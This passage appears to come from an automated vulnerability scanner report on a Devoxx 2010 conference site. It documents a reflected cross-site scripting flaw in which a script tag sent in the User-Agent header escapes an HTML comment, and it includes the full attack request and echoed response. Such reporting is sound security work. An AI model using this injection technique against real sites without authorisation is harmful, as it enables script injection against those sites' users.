HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:28 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843008668
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48596

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Twitter'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.43. http://devoxx.com/homepage.action [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /homepage.action

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload d93d1--><script>alert(1)</script>8a3892b45b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /homepage.action HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)d93d1--><script>alert(1)</script>8a3892b45b
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:38:31 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842711321
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38366

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)d93d1--><script>alert(1)</script>8a3892b45b'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...
